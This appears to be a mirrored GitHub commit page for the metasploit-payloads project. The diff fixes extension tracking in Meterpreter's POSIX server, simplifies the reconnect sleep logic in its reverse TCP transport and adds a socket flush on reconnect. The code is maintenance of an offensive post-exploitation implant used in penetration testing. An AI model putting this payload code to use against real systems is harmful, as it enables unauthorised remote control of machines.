mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-03-18 15:14:10 +01:00
Fix posix extension tracking and transport sleeps
This changeset fixes an issue with POSIX failing to keep track of loaded extensions properly. The timeout calcs for waiting were trying to be too smart and hence were simplified. Also added another flush when reconnecting so that the body of the second instance of metsrv is ignored by the POSIX side. In future, when stageless meterpreter works with POSIX, we won't have to do this.
This commit is contained in:
OJ
parent
83f82f3129
commit
1d6e87180a
c/meterpreter/source/server
@ -80,10 +80,10 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
|
||||
if (pExtension->init)
|
||||
{
|
||||
dprintf("calling InitServerExtension");
|
||||
pExtension->end = first;
|
||||
res = pExtension->init(remote);
|
||||
pExtension->start = extensionCommands;
|
||||
pExtension->getname = dlsym(library, "GetExtensionName");
|
||||
|
||||
|
||||
pExtension->deinit = dlsym(library, "DeinitServerExtension");
|
||||
|
||||
if (pExtension->getname)
|
||||
@ -99,7 +99,7 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
|
||||
|
||||
if (response)
|
||||
{
|
||||
for (command = extensionCommands; command != first; command = command->next)
|
||||
for (command = pExtension->start; command != pExtension->end; command = command->next)
|
||||
{
|
||||
packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
|
||||
}
|
||||
|
||||
@ -46,6 +46,7 @@ BOOL ext_cmd_callback(LPVOID pState, LPVOID pData)
|
||||
{
|
||||
packet_add_tlv_string(pEnum->pResponse, TLV_TYPE_STRING, command->method);
|
||||
}
|
||||
dprintf("[LISTEXT] Finished listing extension: %s", pExt->name);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
@ -17,7 +17,7 @@ MetsrvConfigData global_config =
|
||||
.proxy_username = "METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
|
||||
.proxy_password = "METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
|
||||
.ssl_cert_hash = "METERPRETER_SSL_CERT_HASH\x00\x00\x00",
|
||||
.timeouts.placeholder = "METERP_TIMEOUTS\x00"
|
||||
.timeouts.values = { .expiry = 24*3600*7, .comms = 300, .retry_total = 3600, .retry_wait = 10 }
|
||||
};
|
||||
|
||||
#define SetHandleInformation(a, b, c)
|
||||
@ -40,6 +40,7 @@ static DWORD reverse_tcp_run(SOCKET reverseSocket, struct sockaddr* sockAddr, in
|
||||
{
|
||||
DWORD result = ERROR_SUCCESS;
|
||||
int start = current_unix_timestamp();
|
||||
|
||||
do
|
||||
{
|
||||
int retryStart = current_unix_timestamp();
|
||||
@ -55,11 +56,7 @@ static DWORD reverse_tcp_run(SOCKET reverseSocket, struct sockaddr* sockAddr, in
|
||||
}
|
||||
|
||||
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
|
||||
int waited = current_unix_timestamp() - retryStart;
|
||||
if ((DWORD)waited < retryWait)
|
||||
{
|
||||
sleep((retryWait - (DWORD)waited) * 1000);
|
||||
}
|
||||
sleep(retryWait);
|
||||
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
|
||||
|
||||
if (result == SOCKET_ERROR)
|
||||
@ -168,11 +165,7 @@ static DWORD reverse_tcp6(const char* host, const char* service, ULONG scopeId,
|
||||
}
|
||||
|
||||
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
|
||||
int waited = current_unix_timestamp() - retryStart;
|
||||
if ((DWORD)waited < retryWait)
|
||||
{
|
||||
sleep((retryWait - (DWORD)waited) * 1000);
|
||||
}
|
||||
sleep(retryWait);
|
||||
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
|
||||
|
||||
closesocket(socketHandle);
|
||||
@ -886,6 +879,15 @@ static BOOL configure_tcp_connection(Remote* remote, SOCKET sock)
|
||||
dprintf("[SERVER] Flushing the socket handle...");
|
||||
server_socket_flush(remote);
|
||||
|
||||
// TODO: remove this when stageless stuff happens.
|
||||
// if we've just "reconnected" then we're going to flush
|
||||
// the socket a second time beacuse the second stage is
|
||||
// coming down and we don't want it!
|
||||
if (ctx->sock_desc_size > 0)
|
||||
{
|
||||
server_socket_flush(remote);
|
||||
}
|
||||
|
||||
dprintf("[SERVER] Initializing SSL...");
|
||||
if (server_initialize_ssl(remote))
|
||||
{
|
||||
|
||||
@ -47,11 +47,7 @@ static DWORD reverse_tcp_run(SOCKET reverseSocket, SOCKADDR* sockAddr, int sockA
|
||||
}
|
||||
|
||||
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
|
||||
int waited = current_unix_timestamp() - retryStart;
|
||||
if ((DWORD)waited < retryWait)
|
||||
{
|
||||
Sleep((retryWait - (DWORD)waited) * 1000);
|
||||
}
|
||||
Sleep(retryWait * 1000);
|
||||
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
|
||||
|
||||
if (result == SOCKET_ERROR)
|
||||
@ -168,11 +164,7 @@ static DWORD reverse_tcp6(const char* host, const char* service, ULONG scopeId,
|
||||
}
|
||||
|
||||
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
|
||||
int waited = current_unix_timestamp() - retryStart;
|
||||
if ((DWORD)waited < retryWait)
|
||||
{
|
||||
Sleep((retryWait - (DWORD)waited) * 1000);
|
||||
}
|
||||
Sleep(retryWait * 1000);
|
||||
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
|
||||
|
||||
closesocket(socketHandle);
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user